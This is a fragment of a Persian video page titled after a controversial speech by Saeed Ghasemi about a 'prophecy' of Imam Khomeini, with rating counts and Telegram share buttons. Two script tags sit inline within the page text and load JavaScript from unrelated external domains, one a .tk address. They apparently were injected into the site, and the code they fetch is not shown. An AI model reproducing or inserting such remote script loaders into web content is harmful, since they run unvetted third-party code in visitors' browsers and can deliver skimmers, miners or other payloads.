سخنرانی جنجالی سعید قاسمی درباره پیش گویی امام خمینی


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>منشور روحانیت<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
26

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)